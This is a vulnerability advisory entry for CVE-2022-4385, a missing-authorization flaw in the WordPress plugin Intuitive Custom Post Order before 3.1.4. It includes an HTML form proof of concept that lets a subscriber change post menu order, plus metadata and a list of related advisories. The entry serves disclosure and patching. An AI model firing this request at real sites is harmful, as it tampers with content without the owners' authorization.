Intuitive Custom Post Order < 3.1.4 – Subscriber+ Arbitrary Menu Order Update | CVE 2022-4385 | Plugin Vulnerabilities

Description

The plugin does not check for authorization in the update-menu-order ajax action, allowing any logged in user (with roles as low as Subscriber) to update the menu order

Proof of Concept

Open the below HTML while being logged in as a subscriber

<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="update-menu-order" /> <input type="hidden" name="order" value="post[]=7&post[]=5" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Affects Plugins

intuitive-custom-post-order

Fixed in 3.1.4

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Yuya Kotake

Submitter

Yuya Kotake

Submitter twitter

https://twitter.com/elmore_mk2

Verified

Yes

WPVDB ID

8f900d37-6eee-4434-8b9b-d10cc4a9167c

Timeline

Publicly Published

2023-01-24 (about 1 years ago)

Added

2023-01-24 (about 1 years ago)

Last Updated

2023-02-24 (about 1 years ago)

Other

Published

Title

Published

2015-03-07

Title

Curtain < 1.0.2 - Unauthenticated Maintenance Mode Switch

Published

2023-12-06

Title

System Dashboard < 2.8.8 - Missing Authorization to Information Disclosure (sd_global_value)

Published

2024-05-09

Title

White Label CMS < 2.7.4 - Missing Authorization to Plugin Settings Reset

Published

2024-04-29

Title

Digital Publications by Supsystic < 1.7.8 - Missing Authorization

Published

2024-02-06

Title

Quiz Maker < 6.5.2.5 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Quiz Creation & Modification